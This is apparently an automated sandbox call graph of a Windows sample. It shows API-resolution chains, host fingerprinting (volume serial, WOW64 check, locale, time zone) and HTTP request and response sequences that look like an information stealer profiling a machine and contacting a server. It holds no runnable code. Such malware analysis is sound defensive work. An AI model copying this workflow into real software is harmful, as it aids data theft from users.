14295->14296 14297 eb45c0 2 API calls 14296->14297 14298 eb3ab9 14297->14298 14299 eb45c0 2 API calls 14298->14299 14300 eb3ad2 14299->14300 14301 eb45c0 2 API calls 14300->14301 14302 eb3aeb 14301->14302 14303 eb45c0 2 API calls 14302->14303 14304 eb3b04 14303->14304 14305 eb45c0 2 API calls 14304->14305 14306 eb3b1d 14305->14306 14307 eb45c0 2 API calls 14306->14307 14308 eb3b36 14307->14308 14309 eb45c0 2 API calls 14308->14309 14310 eb3b4f 14309->14310 14311 eb45c0 2 API calls 14310->14311 14312 eb3b68 14311->14312 14313 eb45c0 2 API calls 14312->14313 14314 eb3b81 14313->14314 14315 eb45c0 2 API calls 14314->14315 14316 eb3b9a 14315->14316 14317 eb45c0 2 API calls 14316->14317 14318 eb3bb3 14317->14318 14319 eb45c0 2 API calls 14318->14319 14320 eb3bcc 14319->14320 14321 eb45c0 2 API calls 14320->14321 14322 eb3be5 14321->14322 14323 eb45c0 2 API calls 14322->14323 14324 eb3bfe 14323->14324 14325 eb45c0 2 API calls 14324->14325 14326 eb3c17 14325->14326 14327 eb45c0 2 API calls 14326->14327 14328 eb3c30 14327->14328 14329 eb45c0 2 API calls 14328->14329 14330 eb3c49 14329->14330 14331 eb45c0 2 API calls 14330->14331 14332 eb3c62 14331->14332 14333 eb45c0 2 API calls 14332->14333 14334 eb3c7b 14333->14334 14335 eb45c0 2 API calls 14334->14335 14336 eb3c94 14335->14336 14337 eb45c0 2 API calls 14336->14337 14338 eb3cad 14337->14338 14339 eb45c0 2 API calls 14338->14339 14340 eb3cc6 14339->14340 14341 eb45c0 2 API calls 14340->14341 14342 eb3cdf 14341->14342 14343 eb45c0 2 API calls 14342->14343 14344 eb3cf8 14343->14344 14345 eb45c0 2 API calls 14344->14345 14346 eb3d11 14345->14346 14347 eb45c0 2 API calls 14346->14347 14348 eb3d2a 14347->14348 14349 eb45c0 2 API calls 14348->14349 14350 eb3d43 14349->14350 14351 eb45c0 2 API calls 14350->14351 14352 eb3d5c 14351->14352 14353 eb45c0 2 API calls 14352->14353 14354 eb3d75 14353->14354 14355 eb45c0 2 API calls 14354->14355 14356 eb3d8e 14355->14356 14357 eb45c0 2 API calls 14356->14357 14358 eb3da7 14357->14358 14359 eb45c0 2 API calls 14358->14359 14360 eb3dc0 14359->14360 14361 eb45c0 2 API calls 14360->14361 14362 eb3dd9 14361->14362 14363 eb45c0 2 API calls 14362->14363 14364 eb3df2 14363->14364 14365 eb45c0 2 API calls 14364->14365 14366 eb3e0b 14365->14366 14367 eb45c0 2 API calls 14366->14367 14368 eb3e24 14367->14368 14369 eb45c0 2 API calls 14368->14369 14370 eb3e3d 14369->14370 14371 eb45c0 2 API calls 14370->14371 14372 eb3e56 14371->14372 14373 eb45c0 2 API calls 14372->14373 14374 eb3e6f 14373->14374 14375 eb45c0 2 API calls 14374->14375 14376 eb3e88 14375->14376 14377 eb45c0 2 API calls 14376->14377 14378 eb3ea1 14377->14378 14379 eb45c0 2 API calls 14378->14379 14380 eb3eba 14379->14380 14381 eb45c0 2 API calls 14380->14381 14382 eb3ed3 14381->14382 14383 eb45c0 2 API calls 14382->14383 14384 eb3eec 14383->14384 14385 eb45c0 2 API calls 14384->14385 14386 eb3f05 14385->14386 14387 eb45c0 2 API calls 14386->14387 14388 eb3f1e 14387->14388 14389 eb45c0 2 API calls 14388->14389 14390 eb3f37 14389->14390 14391 eb45c0 2 API calls 14390->14391 14392 eb3f50 14391->14392 14393 eb45c0 2 API calls 14392->14393 14394 eb3f69 14393->14394 14395 eb45c0 2 API calls 14394->14395 14396 eb3f82 14395->14396 14397 eb45c0 2 API calls 14396->14397 14398 eb3f9b 14397->14398 14399 eb45c0 2 API calls 14398->14399 14400 eb3fb4 14399->14400 14401 eb45c0 2 API calls 14400->14401 14402 eb3fcd 14401->14402 14403 eb45c0 2 API calls 14402->14403 14404 eb3fe6 14403->14404 14405 eb45c0 2 API calls 14404->14405 14406 eb3fff 14405->14406 14407 eb45c0 2 API calls 14406->14407 14408 eb4018 14407->14408 14409 eb45c0 2 API calls 14408->14409 14410 eb4031 14409->14410 14411 eb45c0 2 API calls 14410->14411 14412 eb404a 14411->14412 14413 eb45c0 2 API calls 14412->14413 14414 eb4063 14413->14414 14415 eb45c0 2 API calls 14414->14415 14416 eb407c 14415->14416 14417 eb45c0 2 API calls 14416->14417 14418 eb4095 14417->14418 14419 eb45c0 2 API calls 14418->14419 14420 eb40ae 14419->14420 14421 eb45c0 2 API calls 14420->14421 14422 eb40c7 14421->14422 14423 eb45c0 2 API calls 14422->14423 14424 eb40e0 14423->14424 14425 eb45c0 2 API calls 14424->14425 14426 eb40f9 14425->14426 14427 eb45c0 2 API calls 14426->14427 14428 eb4112 14427->14428 14429 eb45c0 2 API calls 14428->14429 14430 eb412b 14429->14430 14431 eb45c0 2 API calls 14430->14431 14432 eb4144 14431->14432 14433 eb45c0 2 API calls 14432->14433 14434 eb415d 14433->14434 14435 eb45c0 2 API calls 14434->14435 14436 eb4176 14435->14436 14437 eb45c0 2 API calls 14436->14437 14438 eb418f 14437->14438 14439 eb45c0 2 API calls 14438->14439 14440 eb41a8 14439->14440 14441 eb45c0 2 API calls 14440->14441 14442 eb41c1 14441->14442 14443 eb45c0 2 API calls 14442->14443 14444 eb41da 14443->14444 14445 eb45c0 2 API calls 14444->14445 14446 eb41f3 14445->14446 14447 eb45c0 2 API calls 14446->14447 14448 eb420c 14447->14448 14449 eb45c0 2 API calls 14448->14449 14450 eb4225 14449->14450 14451 eb45c0 2 API calls 14450->14451 14452 eb423e 14451->14452 14453 eb45c0 2 API calls 14452->14453 14454 eb4257 14453->14454 14455 eb45c0 2 API calls 14454->14455 14456 eb4270 14455->14456 14457 eb45c0 2 API calls 14456->14457 14458 eb4289 14457->14458 14459 eb45c0 2 API calls 14458->14459 14460 eb42a2 14459->14460 14461 eb45c0 2 API calls 14460->14461 14462 eb42bb 14461->14462 14463 eb45c0 2 API calls 14462->14463 14464 eb42d4 14463->14464 14465 eb45c0 2 API calls 14464->14465 14466 eb42ed 14465->14466 14467 eb45c0 2 API calls 14466->14467 14468 eb4306 14467->14468 14469 eb45c0 2 API calls 14468->14469 14470 eb431f 14469->14470 14471 eb45c0 2 API calls 14470->14471 14472 eb4338 14471->14472 14473 eb45c0 2 API calls 14472->14473 14474 eb4351 14473->14474 14475 eb45c0 2 API calls 14474->14475 14476 eb436a 14475->14476 14477 eb45c0 2 API calls 14476->14477 14478 eb4383 14477->14478 14479 eb45c0 2 API calls 14478->14479 14480 eb439c 14479->14480 14481 eb45c0 2 API calls 14480->14481 14482 eb43b5 14481->14482 14483 eb45c0 2 API calls 14482->14483 14484 eb43ce 14483->14484 14485 eb45c0 2 API calls 14484->14485 14486 eb43e7 14485->14486 14487 eb45c0 2 API calls 14486->14487 14488 eb4400 14487->14488 14489 eb45c0 2 API calls 14488->14489 14490 eb4419 14489->14490 14491 eb45c0 2 API calls 14490->14491 14492 eb4432 14491->14492 14493 eb45c0 2 API calls 14492->14493 14494 eb444b 14493->14494 14495 eb45c0 2 API calls 14494->14495 14496 eb4464 14495->14496 14497 eb45c0 2 API calls 14496->14497 14498 eb447d 14497->14498 14499 eb45c0 2 API calls 14498->14499 14500 eb4496 14499->14500 14501 eb45c0 2 API calls 14500->14501 14502 eb44af 14501->14502 14503 eb45c0 2 API calls 14502->14503 14504 eb44c8 14503->14504 14505 eb45c0 2 API calls 14504->14505 14506 eb44e1 14505->14506 14507 eb45c0 2 API calls 14506->14507 14508 eb44fa 14507->14508 14509 eb45c0 2 API calls 14508->14509 14510 eb4513 14509->14510 14511 eb45c0 2 API calls 14510->14511 14512 eb452c 14511->14512 14513 eb45c0 2 API calls 14512->14513 14514 eb4545 14513->14514 14515 eb45c0 2 API calls 14514->14515 14516 eb455e 14515->14516 14517 eb45c0 2 API calls 14516->14517 14518 eb4577 14517->14518 14519 eb45c0 2 API calls 14518->14519 14520 eb4590 14519->14520 14521 eb45c0 2 API calls 14520->14521 14522 eb45a9 14521->14522 14523 ec9c10 14522->14523 14524 eca036 8 API calls 14523->14524 14525 ec9c20 43 API calls 14523->14525 14526 eca0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14524->14526 14527 eca146 14524->14527 14525->14524 14526->14527 14528 eca216 14527->14528 14529 eca153 8 API calls 14527->14529 14530 eca21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14528->14530 14531 eca298 14528->14531 14529->14528 14530->14531 14532 eca2a5 6 API calls 14531->14532 14533 eca337 14531->14533 14532->14533 14534 eca41f 14533->14534 14535 eca344 9 API calls 14533->14535 14536 eca428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14534->14536 14537 eca4a2 14534->14537 14535->14534 14536->14537 14538 eca4dc 14537->14538 14539 eca4ab GetProcAddress GetProcAddress 14537->14539 14540 eca515 14538->14540 14541 eca4e5 GetProcAddress GetProcAddress 14538->14541 14539->14538 14542 eca612 14540->14542 14543 eca522 10 API calls 14540->14543 14541->14540 14544 eca67d 14542->14544 14545 eca61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14542->14545 14543->14542 14546 eca69e 14544->14546 14547 eca686 GetProcAddress 14544->14547 14545->14544 14548 ec5ca3 14546->14548 14549 eca6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14546->14549 14547->14546 14550 eb1590 14548->14550 14549->14548 15671 eb1670 14550->15671 14553 eca7a0 lstrcpy 14554 eb15b5 14553->14554 14555 eca7a0 lstrcpy 14554->14555 14556 eb15c7 14555->14556 14557 eca7a0 lstrcpy 14556->14557 14558 eb15d9 14557->14558 14559 eca7a0 lstrcpy 14558->14559 14560 eb1663 14559->14560 14561 ec5510 14560->14561 14562 ec5521 14561->14562 14563 eca820 2 API calls 14562->14563 14564 ec552e 14563->14564 14565 eca820 2 API calls 14564->14565 14566 ec553b 14565->14566 14567 eca820 2 API calls 14566->14567 14568 ec5548 14567->14568 14569 eca740 lstrcpy 14568->14569 14570 ec5555 14569->14570 14571 eca740 lstrcpy 14570->14571 14572 ec5562 14571->14572 14573 eca740 lstrcpy 14572->14573 14574 ec556f 14573->14574 14575 eca740 lstrcpy 14574->14575 14614 ec557c 14575->14614 14576 ec52c0 25 API calls 14576->14614 14577 ec5643 StrCmpCA 14577->14614 14578 ec56a0 StrCmpCA 14579 ec57dc 14578->14579 14578->14614 14580 eca8a0 lstrcpy 14579->14580 14581 ec57e8 14580->14581 14584 eca820 2 API calls 14581->14584 14582 eca740 lstrcpy 14582->14614 14583 eca820 lstrlen lstrcpy 14583->14614 14585 ec57f6 14584->14585 14587 eca820 2 API calls 14585->14587 14586 ec5856 StrCmpCA 14588 ec5991 14586->14588 14586->14614 14589 ec5805 14587->14589 14590 eca8a0 lstrcpy 14588->14590 14591 eb1670 lstrcpy 14589->14591 14592 ec599d 14590->14592 14613 ec5811 14591->14613 14593 eca820 2 API calls 14592->14593 14594 ec59ab 14593->14594 14596 eca820 2 API calls 14594->14596 14595 ec5a0b StrCmpCA 14597 ec5a28 14595->14597 14598 ec5a16 Sleep 14595->14598 14600 ec59ba 14596->14600 14601 eca8a0 lstrcpy 14597->14601 14598->14614 14599 eca7a0 lstrcpy 14599->14614 14602 eb1670 lstrcpy 14600->14602 14603 ec5a34 14601->14603 14602->14613 14605 eca820 2 API calls 14603->14605 14604 eb1590 lstrcpy 14604->14614 14606 ec5a43 14605->14606 14608 eca820 2 API calls 14606->14608 14607 ec51f0 20 API calls 14607->14614 14610 ec5a52 14608->14610 14609 ec578a StrCmpCA 14609->14614 14611 eb1670 lstrcpy 14610->14611 14611->14613 14612 ec593f StrCmpCA 14612->14614 14613->13668 14614->14576 14614->14577 14614->14578 14614->14582 14614->14583 14614->14586 14614->14595 14614->14599 14614->14604 14614->14607 14614->14609 14614->14612 14615 eca8a0 lstrcpy 14614->14615 14615->14614 14617 ec754c 14616->14617 14618 ec7553 GetVolumeInformationA 14616->14618 14617->14618 14619 ec7591 14618->14619 14620 ec75fc GetProcessHeap RtlAllocateHeap 14619->14620 14621 ec7628 wsprintfA 14620->14621 14622 ec7619 14620->14622 14624 eca740 lstrcpy 14621->14624 14623 eca740 lstrcpy 14622->14623 14625 ec5da7 14623->14625 14624->14625 14625->13689 14627 eca7a0 lstrcpy 14626->14627 14628 eb4899 14627->14628 15680 eb47b0 14628->15680 14630 eb48a5 14631 eca740 lstrcpy 14630->14631 14632 eb48d7 14631->14632 14633 eca740 lstrcpy 14632->14633 14634 eb48e4 14633->14634 14635 eca740 lstrcpy 14634->14635 14636 eb48f1 14635->14636 14637 eca740 lstrcpy 14636->14637 14638 eb48fe 14637->14638 14639 eca740 lstrcpy 14638->14639 14640 eb490b InternetOpenA StrCmpCA 14639->14640 14641 eb4944 14640->14641 14642 eb4ecb InternetCloseHandle 14641->14642 15686 ec8b60 14641->15686 14644 eb4ee8 14642->14644 15701 eb9ac0 CryptStringToBinaryA 14644->15701 14645 eb4963 15694 eca920 14645->15694 14648 eb4976 14650 eca8a0 lstrcpy 14648->14650 14655 eb497f 14650->14655 14651 eca820 2 API calls 14652 eb4f05 14651->14652 14654 eca9b0 4 API calls 14652->14654 14653 eb4f27 ctype 14658 eca7a0 lstrcpy 14653->14658 14656 eb4f1b 14654->14656 14659 eca9b0 4 API calls 14655->14659 14657 eca8a0 lstrcpy 14656->14657 14657->14653 14670 eb4f57 14658->14670 14660 eb49a9 14659->14660 14661 eca8a0 lstrcpy 14660->14661 14662 eb49b2 14661->14662 14663 eca9b0 4 API calls 14662->14663 14664 eb49d1 14663->14664 14665 eca8a0 lstrcpy 14664->14665 14666 eb49da 14665->14666 14667 eca920 3 API calls 14666->14667 14668 eb49f8 14667->14668 14669 eca8a0 lstrcpy 14668->14669 14671 eb4a01 14669->14671 14670->13692 14672 eca9b0 4 API calls 14671->14672 14673 eb4a20 14672->14673 14674 eca8a0 lstrcpy 14673->14674 14675 eb4a29 14674->14675 14676 eca9b0 4 API calls 14675->14676 14677 eb4a48 14676->14677 14678 eca8a0 lstrcpy 14677->14678 14679 eb4a51 14678->14679 14680 eca9b0 4 API calls 14679->14680 14681 eb4a7d 14680->14681 14682 eca920 3 API calls 14681->14682 14683 eb4a84 14682->14683 14684 eca8a0 lstrcpy 14683->14684 14685 eb4a8d 14684->14685 14686 eb4aa3 InternetConnectA 14685->14686 14686->14642 14687 eb4ad3 HttpOpenRequestA 14686->14687 14689 eb4b28 14687->14689 14690 eb4ebe InternetCloseHandle 14687->14690 14691 eca9b0 4 API calls 14689->14691 14690->14642 14692 eb4b3c 14691->14692 14693 eca8a0 lstrcpy 14692->14693 14694 eb4b45 14693->14694 14695 eca920 3 API calls 14694->14695 14696 eb4b63 14695->14696 14697 eca8a0 lstrcpy 14696->14697 14698 eb4b6c 14697->14698 14699 eca9b0 4 API calls 14698->14699 14700 eb4b8b 14699->14700 14701 eca8a0 lstrcpy 14700->14701 14702 eb4b94 14701->14702 14703 eca9b0 4 API calls 14702->14703 14704 eb4bb5 14703->14704 14705 eca8a0 lstrcpy 14704->14705 14706 eb4bbe 14705->14706 14707 eca9b0 4 API calls 14706->14707 14708 eb4bde 14707->14708 14709 eca8a0 lstrcpy 14708->14709 14710 eb4be7 14709->14710 14711 eca9b0 4 API calls 14710->14711 14712 eb4c06 14711->14712 14713 eca8a0 lstrcpy 14712->14713 14714 eb4c0f 14713->14714 14715 eca920 3 API calls 14714->14715 14716 eb4c2d 14715->14716 14717 eca8a0 lstrcpy 14716->14717 14718 eb4c36 14717->14718 14719 eca9b0 4 API calls 14718->14719 14720 eb4c55 14719->14720 14721 eca8a0 lstrcpy 14720->14721 14722 eb4c5e 14721->14722 14723 eca9b0 4 API calls 14722->14723 14724 eb4c7d 14723->14724 14725 eca8a0 lstrcpy 14724->14725 14726 eb4c86 14725->14726 14727 eca920 3 API calls 14726->14727 14728 eb4ca4 14727->14728 14729 eca8a0 lstrcpy 14728->14729 14730 eb4cad 14729->14730 14731 eca9b0 4 API calls 14730->14731 14732 eb4ccc 14731->14732 14733 eca8a0 lstrcpy 14732->14733 14734 eb4cd5 14733->14734 14735 eca9b0 4 API calls 14734->14735 14736 eb4cf6 14735->14736 14737 eca8a0 lstrcpy 14736->14737 14738 eb4cff 14737->14738 14739 eca9b0 4 API calls 14738->14739 14740 eb4d1f 14739->14740 14741 eca8a0 lstrcpy 14740->14741 14742 eb4d28 14741->14742 14743 eca9b0 4 API calls 14742->14743 14744 eb4d47 14743->14744 14745 eca8a0 lstrcpy 14744->14745 14746 eb4d50 14745->14746 14747 eca920 3 API calls 14746->14747 14748 eb4d6e 14747->14748 14749 eca8a0 lstrcpy 14748->14749 14750 eb4d77 14749->14750 14751 eca740 lstrcpy 14750->14751 14752 eb4d92 14751->14752 14753 eca920 3 API calls 14752->14753 14754 eb4db3 14753->14754 14755 eca920 3 API calls 14754->14755 14756 eb4dba 14755->14756 14757 eca8a0 lstrcpy 14756->14757 14758 eb4dc6 14757->14758 14759 eb4de7 lstrlen 14758->14759 14760 eb4dfa 14759->14760 14761 eb4e03 lstrlen 14760->14761 15700 ecaad0 14761->15700 14763 eb4e13 HttpSendRequestA 14764 eb4e32 InternetReadFile 14763->14764 14765 eb4e67 InternetCloseHandle 14764->14765 14770 eb4e5e 14764->14770 14767 eca800 14765->14767 14767->14690 14768 eca9b0 4 API calls 14768->14770 14769 eca8a0 lstrcpy 14769->14770 14770->14764 14770->14765 14770->14768 14770->14769 15707 ecaad0 14771->15707 14773 ec17c4 StrCmpCA 14774 ec17cf ExitProcess 14773->14774 14785 ec17d7 14773->14785 14775 ec19c2 14775->13694 14776 ec18ad StrCmpCA 14776->14785 14777 ec18cf StrCmpCA 14777->14785 14778 ec185d StrCmpCA 14778->14785 14779 ec187f StrCmpCA 14779->14785 14780 ec1970 StrCmpCA 14780->14785 14781 ec18f1 StrCmpCA 14781->14785 14782 ec1951 StrCmpCA 14782->14785 14783 ec1932 StrCmpCA 14783->14785 14784 ec1913 StrCmpCA 14784->14785 14785->14775 14785->14776 14785->14777 14785->14778 14785->14779 14785->14780 14785->14781 14785->14782 14785->14783 14785->14784 14786 eca820 lstrlen lstrcpy 14785->14786 14786->14785 14788 eca7a0 lstrcpy 14787->14788 14789 eb5979 14788->14789 14790 eb47b0 2 API calls 14789->14790 14791 eb5985 14790->14791 14792 eca740 lstrcpy 14791->14792 14793 eb59ba 14792->14793 14794 eca740 lstrcpy 14793->14794 14795 eb59c7 14794->14795 14796 eca740 lstrcpy 14795->14796 14797 eb59d4 14796->14797 14798 eca740 lstrcpy 14797->14798 14799 eb59e1 14798->14799 14800 eca740 lstrcpy 14799->14800 14801 eb59ee InternetOpenA StrCmpCA 14800->14801 14802 eb5a1d 14801->14802 14803 eb5fc3 InternetCloseHandle 14802->14803 14804 ec8b60 3 API calls 14802->14804 14805 eb5fe0 14803->14805 14806 eb5a3c 14804->14806 14808 eb9ac0 4 API calls 14805->14808 14807 eca920 3 API calls 14806->14807 14809 eb5a4f 14807->14809 14810 eb5fe6 14808->14810 14811 eca8a0 lstrcpy 14809->14811 14812 eca820 2 API calls 14810->14812 14815 eb601f ctype 14810->14815 14817 eb5a58 14811->14817 14813 eb5ffd 14812->14813 14814 eca9b0 4 API calls 14813->14814 14816 eb6013 14814->14816 14819 eca7a0 lstrcpy 14815->14819 14818 eca8a0 lstrcpy 14816->14818 14820 eca9b0 4 API calls 14817->14820 14818->14815 14828 eb604f 14819->14828 14821 eb5a82 14820->14821 14822 eca8a0 lstrcpy 14821->14822 14823 eb5a8b 14822->14823 14824 eca9b0 4 API calls 14823->14824 14825 eb5aaa 14824->14825 14826 eca8a0 lstrcpy 14825->14826 14827 eb5ab3 14826->14827 14829 eca920 3 API calls 14827->14829 14828->13700 14830 eb5ad1 14829->14830 14831 eca8a0 lstrcpy 14830->14831 14832 eb5ada 14831->14832 14833 eca9b0 4 API calls 14832->14833 14834 eb5af9 14833->14834 14835 eca8a0 lstrcpy 14834->14835 14836 eb5b02 14835->14836 14837 eca9b0 4 API calls 14836->14837 14838 eb5b21 14837->14838 14839 eca8a0 lstrcpy 14838->14839 14840 eb5b2a 14839->14840 14841 eca9b0 4 API calls 14840->14841 14842 eb5b56 14841->14842 14843 eca920 3 API calls 14842->14843 14844 eb5b5d 14843->14844 14845 eca8a0 lstrcpy 14844->14845 14846 eb5b66 14845->14846 14847 eb5b7c InternetConnectA 14846->14847 14847->14803 14848 eb5bac HttpOpenRequestA 14847->14848 14850 eb5c0b 14848->14850 14851 eb5fb6 InternetCloseHandle 14848->14851 14852 eca9b0 4 API calls 14850->14852 14851->14803 14853 eb5c1f 14852->14853 14854 eca8a0 lstrcpy 14853->14854 14855 eb5c28 14854->14855 14856 eca920 3 API calls 14855->14856 14857 eb5c46 14856->14857 14858 eca8a0 lstrcpy 14857->14858 14859 eb5c4f 14858->14859 14860 eca9b0 4 API calls 14859->14860 14861 eb5c6e 14860->14861 14862 eca8a0 lstrcpy 14861->14862 14863 eb5c77 14862->14863 14864 eca9b0 4 API calls 14863->14864 14865 eb5c98 14864->14865 14866 eca8a0 lstrcpy 14865->14866 14867 eb5ca1 14866->14867 14868 eca9b0 4 API calls 14867->14868 14869 eb5cc1 14868->14869 14870 eca8a0 lstrcpy 14869->14870 14871 eb5cca 14870->14871 14872 eca9b0 4 API calls 14871->14872 14873 eb5ce9 14872->14873 14874 eca8a0 lstrcpy 14873->14874 14875 eb5cf2 14874->14875 14876 eca920 3 API calls 14875->14876 14877 eb5d10 14876->14877 14878 eca8a0 lstrcpy 14877->14878 14879 eb5d19 14878->14879 14880 eca9b0 4 API calls 14879->14880 14881 eb5d38 14880->14881 14882 eca8a0 lstrcpy 14881->14882 14883 eb5d41 14882->14883 14884 eca9b0 4 API calls 14883->14884 14885 eb5d60 14884->14885 14886 eca8a0 lstrcpy 14885->14886 14887 eb5d69 14886->14887 14888 eca920 3 API calls 14887->14888 14889 eb5d87 14888->14889 14890 eca8a0 lstrcpy 14889->14890 14891 eb5d90 14890->14891 14892 eca9b0 4 API calls 14891->14892 14893 eb5daf 14892->14893 14894 eca8a0 lstrcpy 14893->14894 14895 eb5db8 14894->14895 14896 eca9b0 4 API calls 14895->14896 14897 eb5dd9 14896->14897 14898 eca8a0 lstrcpy 14897->14898 14899 eb5de2 14898->14899 14900 eca9b0 4 API calls 14899->14900 14901 eb5e02 14900->14901 14902 eca8a0 lstrcpy 14901->14902 14903 eb5e0b 14902->14903 14904 eca9b0 4 API calls 14903->14904 14905 eb5e2a 14904->14905 14906 eca8a0 lstrcpy 14905->14906 14907 eb5e33 14906->14907 14908 eca920 3 API calls 14907->14908 14909 eb5e54 14908->14909 14910 eca8a0 lstrcpy 14909->14910 14911 eb5e5d 14910->14911 14912 eb5e70 lstrlen 14911->14912 15708 ecaad0 14912->15708 14914 eb5e81 lstrlen GetProcessHeap RtlAllocateHeap 15709 ecaad0 14914->15709 14916 eb5eae lstrlen 14917 eb5ebe 14916->14917 14918 eb5ed7 lstrlen 14917->14918 14919 eb5ee7 14918->14919 14920 eb5ef0 lstrlen 14919->14920 14921 eb5f03 14920->14921 14922 eb5f1a lstrlen 14921->14922 15710 ecaad0 14922->15710 14924 eb5f2a HttpSendRequestA 14925 eb5f35 InternetReadFile 14924->14925 14926 eb5f6a InternetCloseHandle 14925->14926 14930 eb5f61 14925->14930 14926->14851 14928 eca9b0 4 API calls 14928->14930 14929 eca8a0 lstrcpy 14929->14930 14930->14925 14930->14926 14930->14928 14930->14929 14933 ec1077 14931->14933 14932 ec1151 14932->13702 14933->14932 14934 eca820 lstrlen lstrcpy 14933->14934 14934->14933 14936 ec0db7 14935->14936 14937 ec0f17 14936->14937 14938 ec0ea4 StrCmpCA 14936->14938 14939 ec0e27 StrCmpCA 14936->14939 14940 ec0e67 StrCmpCA 14936->14940 14941 eca820 lstrlen lstrcpy 14936->14941 14937->13710 14938->14936 14939->14936 14940->14936 14941->14936 14946 ec0f67 14942->14946 14943 ec1044 14943->13718 14944 ec0fb2 StrCmpCA 14944->14946 14945 eca820 lstrlen lstrcpy 14945->14946 14946->14943 14946->14944 14946->14945 14948 eca740 lstrcpy 14947->14948 14949 ec1a26 14948->14949 14950 eca9b0 4 API calls 14949->14950 14951 ec1a37 14950->14951 14952 eca8a0 lstrcpy 14951->14952 14953 ec1a40 14952->14953 14954 eca9b0 4 API calls 14953->14954 14955 ec1a5b 14954->14955 14956 eca8a0 lstrcpy 14955->14956 14957 ec1a64 14956->14957 14958 eca9b0 4 API calls 14957->14958 14959 ec1a7d 14958->14959 14960 eca8a0 lstrcpy 14959->14960 14961 ec1a86 14960->14961 14962 eca9b0 4 API calls 14961->14962 14963 ec1aa1 14962->14963 14964 eca8a0 lstrcpy 14963->14964 14965 ec1aaa 14964->14965 14966 eca9b0 4 API calls 14965->14966 14967 ec1ac3 14966->14967 14968 eca8a0 lstrcpy 14967->14968 14969 ec1acc 14968->14969 14970 eca9b0 4 API calls 14969->14970 14971 ec1ae7 14970->14971 14972 eca8a0 lstrcpy 14971->14972 14973 ec1af0 14972->14973 14974 eca9b0 4 API calls 14973->14974 14975 ec1b09 14974->14975 14976 eca8a0 lstrcpy 14975->14976 14977 ec1b12 14976->14977 14978 eca9b0 4 API calls 14977->14978 14979 ec1b2d 14978->14979 14980 eca8a0 lstrcpy 14979->14980 14981 ec1b36 14980->14981 14982 eca9b0 4 API calls 14981->14982 14983 ec1b4f 14982->14983 14984 eca8a0 lstrcpy 14983->14984 14985 ec1b58 14984->14985 14986 eca9b0 4 API calls 14985->14986 14987 ec1b76 14986->14987 14988 eca8a0 lstrcpy 14987->14988 14989 ec1b7f 14988->14989 14990 ec7500 6 API calls 14989->14990 14991 ec1b96 14990->14991 14992 eca920 3 API calls 14991->14992 14993 ec1ba9 14992->14993 14994 eca8a0 lstrcpy 14993->14994 14995 ec1bb2 14994->14995 14996 eca9b0 4 API calls 14995->14996 14997 ec1bdc 14996->14997 14998 eca8a0 lstrcpy 14997->14998 14999 ec1be5 14998->14999 15000 eca9b0 4 API calls 14999->15000 15001 ec1c05 15000->15001 15002 eca8a0 lstrcpy 15001->15002 15003 ec1c0e 15002->15003 15711 ec7690 GetProcessHeap RtlAllocateHeap 15003->15711 15006 eca9b0 4 API calls 15007 ec1c2e 15006->15007 15008 eca8a0 lstrcpy 15007->15008 15009 ec1c37 15008->15009 15010 eca9b0 4 API calls 15009->15010 15011 ec1c56 15010->15011 15012 eca8a0 lstrcpy 15011->15012 15013 ec1c5f 15012->15013 15014 eca9b0 4 API calls 15013->15014 15015 ec1c80 15014->15015 15016 eca8a0 lstrcpy 15015->15016 15017 ec1c89 15016->15017 15718 ec77c0 GetCurrentProcess IsWow64Process 15017->15718 15020 eca9b0 4 API calls 15021 ec1ca9 15020->15021 15022 eca8a0 lstrcpy 15021->15022 15023 ec1cb2 15022->15023 15024 eca9b0 4 API calls 15023->15024 15025 ec1cd1 15024->15025 15026 eca8a0 lstrcpy 15025->15026 15027 ec1cda 15026->15027 15028 eca9b0 4 API calls 15027->15028 15029 ec1cfb 15028->15029 15030 eca8a0 lstrcpy 15029->15030 15031 ec1d04 15030->15031 15032 ec7850 3 API calls 15031->15032 15033 ec1d14 15032->15033 15034 eca9b0 4 API calls 15033->15034 15035 ec1d24 15034->15035 15036 eca8a0 lstrcpy 15035->15036 15037 ec1d2d 15036->15037 15038 eca9b0 4 API calls 15037->15038 15039 ec1d4c 15038->15039 15040 eca8a0 lstrcpy 15039->15040 15041 ec1d55 15040->15041 15042 eca9b0 4 API calls 15041->15042 15043 ec1d75 15042->15043 15044 eca8a0 lstrcpy 15043->15044 15045 ec1d7e 15044->15045 15046 ec78e0 3 API calls 15045->15046 15047 ec1d8e 15046->15047 15048 eca9b0 4 API calls 15047->15048 15049 ec1d9e 15048->15049 15050 eca8a0 lstrcpy 15049->15050 15051 ec1da7 15050->15051 15052 eca9b0 4 API calls 15051->15052 15053 ec1dc6 15052->15053 15054 eca8a0 lstrcpy 15053->15054 15055 ec1dcf 15054->15055 15056 eca9b0 4 API calls 15055->15056 15057 ec1df0 15056->15057 15058 eca8a0 lstrcpy 15057->15058 15059 ec1df9 15058->15059 15720 ec7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15059->15720 15062 eca9b0 4 API calls 15063 ec1e19 15062->15063 15064 eca8a0 lstrcpy 15063->15064 15065 ec1e22 15064->15065 15066 eca9b0 4 API calls 15065->15066 15067 ec1e41 15066->15067 15068 eca8a0 lstrcpy 15067->15068 15069 ec1e4a 15068->15069 15070 eca9b0 4 API calls 15069->15070 15071 ec1e6b 15070->15071 15072 eca8a0 lstrcpy 15071->15072 15073 ec1e74 15072->15073 15722 ec7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15073->15722 15076 eca9b0 4 API calls 15077 ec1e94 15076->15077 15078 eca8a0 lstrcpy 15077->15078 15079 ec1e9d 15078->15079 15080 eca9b0 4 API calls 15079->15080 15081 ec1ebc 15080->15081 15082 eca8a0 lstrcpy 15081->15082 15083 ec1ec5 15082->15083 15084 eca9b0 4 API calls 15083->15084 15085 ec1ee5 15084->15085 15086 eca8a0 lstrcpy 15085->15086 15087 ec1eee 15086->15087 15725 ec7b00 GetUserDefaultLocaleName 15087->15725 15090 eca9b0 4 API calls 15091 ec1f0e 15090->15091 15092 eca8a0 lstrcpy 15091->15092 15093 ec1f17 15092->15093 15094 eca9b0 4 API calls 15093->15094 15095 ec1f36 15094->15095 15096 eca8a0 lstrcpy 15095->15096 15097 ec1f3f 15096->15097 15098 eca9b0 4 API calls 15097->15098 15099 ec1f60 15098->15099 15100 eca8a0 lstrcpy 15099->15100 15101 